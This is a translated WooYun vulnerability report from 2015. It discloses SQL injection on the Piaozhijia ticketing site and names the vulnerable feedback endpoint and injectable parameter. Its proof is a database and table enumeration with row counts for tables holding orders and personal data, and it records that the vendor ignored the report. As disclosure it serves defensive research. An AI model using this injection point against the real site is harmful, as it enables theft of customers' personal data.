
Vulnerability summary

Defect ID: wooyun-2015-0138690

Title: SQL injection on the 票之家 (Piaozhijia) main site can leak millions of ID card numbers, orders, phone numbers, names and more

Affected vendor: 票之家

Reporter: 撸撸侠

Submitted: 2015-09-02 20:50

Fix deadline: 2015-10-17 20:52

Published: 2015-10-17 20:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-02: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-10-17: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection on the 票之家 (Piaozhijia) main site can leak millions of ID card numbers, orders, phone numbers, names and more

Detailed description:

http://www.piaozhijia.cn:80/feedback/queryFeedbackList
data:mobile=angelina

Proof of vulnerability:

available databases [6]:
[*] information_schema
[*] pzj_flight
[*] pzj_hotel
[*] pzj_ticket
[*] pzj_tools
[*] test


Database: pzj_ticket
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| tbl_data_check_record | 5568222 |
| tbl_data_check_record_2 | 2244036 |
| tbl_data_equipment_detail | 1797302 |
| tbl_biz_ticket | 1370044 |
| tbl_data_system_log | 681329 |
| tbl_biz_flow | 347417 |
| tbl_biz_orders | 300111 |
| tbl_biz_flow_copy | 250294 |
| tbl_data_operate_log | 240067 |
| tbl_biz_guide_orders | 204249 |
| tbl_data_bill_record | 147784 |
| om_order | 140907 |
| tbl_biz_ticket_detail | 94553 |
| tbl_biz_trading_record | 27339 |
| tbl_biz_orders_redun | 20770 |
| tbl_biz_flow_bak | 20018 |
| tbl_data_his_query | 16412 |
| tbl_app_account | 15038 |
| tbl_biz_account | 14783 |
| tbl_biz_bank | 14655 |
| login_log | 14264 |
| tbl_data_guide | 13441 |
| tbl_data_theater_water | 12934 |
| tbl_data_sign_contract | 7690 |
| tbl_data_product_sale | 5248 |
| tbl_app_account_role | 3222 |
| tbl_data_reseller | 2967 |
| tbl_biz_ticket_appoint | 2219 |
| tbl_biz_orders_voucher | 1974 |
| tbl_data_free_voucher | 1890 |
| tbl_biz_order_notice | 1747 |
| tbl_data_open_product | 1159 |
| tbl_data_water_consumption | 1135 |
| tbl_data_equipment_bind | 968 |
| tbl_biz_ticket_finger | 967 |
| tbl_app_website | 950 |
| tbl_app_account_navigation | 908 |
| tbl_data_price_basic | 792 |
| tbl_biz_account_check | 695 |
| tbl_data_product_child | 667 |
| tbl_biz_orders_refund | 625 |
| tbl_data_product | 607 |
| tbl_biz_flow_check | 567 |
| tbl_data_account_position | 478 |
| tbl_data_reseller_partner | 341 |
| tbl_biz_flow_bak1 | 318 |
| tbl_data_equipment | 246 |
| tbl_data_order_remarks | 239 |
| tbl_data_protocol_unit | 215 |
| tbl_data_price_auth | 207 |
| tbl_biz_payrecord | 205 |
| tbl_data_standard | 161 |
| tbl_data_settle_tx_log | 152 |
| tbl_data_supplier_scene | 150 |
| tbl_app_role_menu | 140 |
| tbl_data_position_equipment | 129 |
| fh_role_menu | 124 |
| tbl_app_menu_function | 96 |
| fh_menu_function | 92 |
| tbl_data_system_auditlog | 90 |
| tbl_biz_flow_0811 | 83 |
| tbl_data_supplier | 82 |
| fh_role_menu_old | 79 |
| tbl_data_scene | 78 |
| tbl_biz_print_record | 74 |
| fh_menu_function_copy | 72 |
| tbl_app_permission_resources | 70 |
| tbl_data_objwd | 70 |
| tbl_data_position | 68 |
| tbl_biz_subsidie_setting | 67 |
| tbl_data_rebate_rule | 61 |
| party_reseller | 58 |
| tbl_data_guide_work | 52 |
| fh_menu_function_old | 47 |
| tbl_biz_taobao_serialnum | 47 |
| tbl_data_id_builder | 44 |
| tbl_data_supplier_contract | 44 |
| help_context | 40 |
| tbl_data_rebate_conditions | 39 |
| tbl_data_special_voucher | 36 |
| tbl_app_menu_category | 35 |
| tbl_data_from_type | 29 |
| om_schedule | 27 |
| tbl_data_id_generator | 25 |
| om_feedback | 23 |
| tbl_biz_contacts | 20 |
| tbl_data_fh_scene_id | 18 |
| fh_menu_category | 17 |
| fh_menu_category_old | 16 |
| tbl_biz_authorize_seller | 16 |
| tbl_biz_account_flow | 12 |
| tbl_data_verification | 12 |
| tbl_biz_coupon_water | 11 |
| tbl_data_product_appoint | 10 |
| tbl_app_role | 8 |
| tbl_data_show_chart | 6 |
| om_address | 5 |
| sys_cms | 5 |
| tbl_data_reseller_guide | 5 |
| om_order_bak | 4 |
| pzj_news | 4 |
| tbl_app_navigation | 4 |
| tbl_biz_orders_bak | 4 |
| tbl_biz_ticket_bak | 4 |
| tbl_biz_trading_record_bak | 4 |
| help_tree | 3 |
| tbl_biz_taobao | 3 |
| tbl_data_store_auth | 3 |
| tbl_data_reseller_link | 2 |
| tbl_data_show_screening | 2 |
| tbl_appapi_feedback | 1 |
| tbl_data_screening | 1 |
+------------------------------+---------+


[Screenshot attached: 屏幕快照 2015-09-02 下午8.43.39.png]

Remediation:

Copyright notice: when reposting, please credit the source 撸撸侠@乌云


Vendor response

Vendor reply:

Vendor could not be contacted, or vendor actively refused the report

Vulnerability Rank: 15 (WooYun rating)